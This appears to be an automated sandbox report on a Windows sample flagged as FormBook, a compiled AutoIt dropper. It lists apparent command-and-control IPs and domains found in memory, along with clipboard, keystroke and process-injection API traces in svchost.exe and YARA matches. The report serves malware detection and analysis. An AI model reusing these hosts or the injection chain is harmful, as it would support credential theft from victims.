HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 00:01:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6

Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/
Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/(
Source: uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dwlowhbefckeyd
Source: uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dwlowhbefckeydsA
Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107/dwlowhbefckeydx
Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://18.141.10.107:80/dwlowhbefckeyd
Source: uG3I84bQEr.exe, 00000000.00000002.2247919314.0000000000E33000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp, uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://54.244.188.177/
Source: uG3I84bQEr.exe, 00000000.00000002.2247618432.0000000000D48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pywolwnvd.biz/
Source: svchost.exe, 00000003.00000003.2473240347.0000000002A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2473112981.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, bGPwjAWMEtES.exe, 00000006.00000003.2585902954.000000000120F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://server/get.asp
Source: bGPwjAWMEtES.exe, 00000006.00000002.3480937676.000000000950A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.soainsaat.xyz
Source: bGPwjAWMEtES.exe, 00000006.00000002.3480937676.000000000950A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.soainsaat.xyz/rum2/
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: bGPwjAWMEtES.exe, 00000006.00000002.3479790735.00000000075F6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3473009686.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, bitsadmin.exe, 00000007.00000002.3474501511.0000000006020000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: bitsadmin.exe, 00000007.00000003.2701406497.0000000007AA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bitsadmin.exe, 00000007.00000002.3470880703.0000000002E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: bitsadmin.exe, 00000007.00000002.3474681876.0000000007AC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00474164

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00473F66

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0046001C

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0048CABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.svchost.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505596273.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2505839285.00000000029A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3472823887.0000000005F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2506486835.0000000006550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00403B3A
Source: uG3I84bQEr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: uG3I84bQEr.exe, 00000000.00000000.2219681547.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_351af87c-1
Source: uG3I84bQEr.exe, 00000000.00000000.2219681547.00000000004B4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_b88205ce-b
Source: uG3I84bQEr.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_fd1f02c3-f
Source: uG3I84bQEr.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_689389cf-c

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0052CA93 NtClose,	3_2_0052CA93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072B60 NtClose,LdrInitializeThunk,	3_2_03072B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_03072DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030735C0 NtCreateMutant,LdrInitializeThunk,	3_2_030735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03074340 NtSetContextThread,	3_2_03074340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03074650 NtSuspendThread,	3_2_03074650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072B80 NtQueryInformationFile,	3_2_03072B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072BA0 NtEnumerateValueKey,	3_2_03072BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072BE0 NtQueryValueKey,	3_2_03072BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072BF0 NtAllocateVirtualMemory,	3_2_03072BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072AB0 NtWaitForSingleObject,	3_2_03072AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072AD0 NtReadFile,	3_2_03072AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072AF0 NtWriteFile,	3_2_03072AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072F30 NtCreateSection,	3_2_03072F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072F60 NtCreateProcessEx,	3_2_03072F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072F90 NtProtectVirtualMemory,	3_2_03072F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072FA0 NtQuerySection,	3_2_03072FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072FB0 NtResumeThread,	3_2_03072FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072FE0 NtCreateFile,	3_2_03072FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072E30 NtWriteVirtualMemory,	3_2_03072E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072E80 NtReadVirtualMemory,	3_2_03072E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072EA0 NtAdjustPrivilegesToken,	3_2_03072EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072EE0 NtQueueApcThread,	3_2_03072EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072D00 NtSetInformationFile,	3_2_03072D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072D10 NtMapViewOfSection,	3_2_03072D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072D30 NtUnmapViewOfSection,	3_2_03072D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072DB0 NtEnumerateKey,	3_2_03072DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072DD0 NtDelayExecution,	3_2_03072DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072C00 NtQueryInformationProcess,	3_2_03072C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072C60 NtCreateKey,	3_2_03072C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072C70 NtFreeVirtualMemory,	3_2_03072C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072CA0 NtQueryInformationToken,	3_2_03072CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072CC0 NtQueryVirtualMemory,	3_2_03072CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03072CF0 NtOpenProcess,	3_2_03072CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03073010 NtOpenDirectoryObject,	3_2_03073010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03073090 NtSetValueKey,	3_2_03073090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030739B0 NtGetContextThread,	3_2_030739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03073D10 NtOpenProcessToken,	3_2_03073D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03073D70 NtOpenThread,	3_2_03073D70

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0046A1EF

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00458310

Source: C:\Users\user\Desktop\uG3I84bQEr.exe

Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004651BD

Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0040E6A0	0_2_0040E6A0
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0042D975	0_2_0042D975
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0040FCE0	0_2_0040FCE0
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004221C5	0_2_004221C5
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004362D2	0_2_004362D2
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004803DA	0_2_004803DA
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0043242E	0_2_0043242E
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004225FA	0_2_004225FA
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0045E616	0_2_0045E616
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_004166E1	0_2_004166E1
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0043878F	0_2_0043878F
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00436844	0_2_00436844
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00480857	0_2_00480857
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00418808	0_2_00418808
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00468889	0_2_00468889
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0042CB21	0_2_0042CB21
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00436DB6	0_2_00436DB6
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00416F9E	0_2_00416F9E
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00413030	0_2_00413030
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0042F1D9	0_2_0042F1D9
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00423187	0_2_00423187
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00401287	0_2_00401287
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00421484	0_2_00421484
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00415520	0_2_00415520
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00427696	0_2_00427696
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00415760	0_2_00415760
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00421978	0_2_00421978
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00439AB5	0_2_00439AB5
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0051FCC8	0_2_0051FCC8
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00487DDB	0_2_00487DDB
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00421D90	0_2_00421D90
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0042BDA6	0_2_0042BDA6
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_0040DF00	0_2_0040DF00
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00413FE0	0_2_00413FE0
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B900D9	0_2_00B900D9
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B56EAF	0_2_00B56EAF
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B551EE	0_2_00B551EE
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B9515C	0_2_00B9515C
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B8D580	0_2_00B8D580
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B83780	0_2_00B83780
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B8C7F0	0_2_00B8C7F0
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B939A3	0_2_00B939A3
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B85980	0_2_00B85980
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B57B71	0_2_00B57B71
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00B57F80	0_2_00B57F80
Source: C:\Users\user\Desktop\uG3I84bQEr.exe	Code function: 0_2_00DDA008	0_2_00DDA008
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00518993	3_2_00518993
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00501ACB	3_2_00501ACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0052F0B3	3_2_0052F0B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_005101D3	3_2_005101D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_005032F0	3_2_005032F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00502A90	3_2_00502A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0050E3D3	3_2_0050E3D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_005103F3	3_2_005103F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00516B93	3_2_00516B93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00516B8E	3_2_00516B8E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00501C40	3_2_00501C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00501C3A	3_2_00501C3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0050E51C	3_2_0050E51C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0050E523	3_2_0050E523
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00502E50	3_2_00502E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00502E49	3_2_00502E49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00502F19	3_2_00502F19
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00502720	3_2_00502720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FA352	3_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0304E3F0	3_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_031003E6	3_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E0274	3_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C02C0	3_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03030100	3_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030DA118	3_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030C8158	3_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F41A2	3_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_031001AA	3_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F81CC	3_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030D2000	3_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03064750	3_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040770	3_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0303C7C0	3_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0305C6E0	3_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03040535	3_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03100591	3_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030E4420	3_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F2446	3_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030EE4F6	3_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030FAB40	3_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_030F6BD7	3_2_030F6BD7
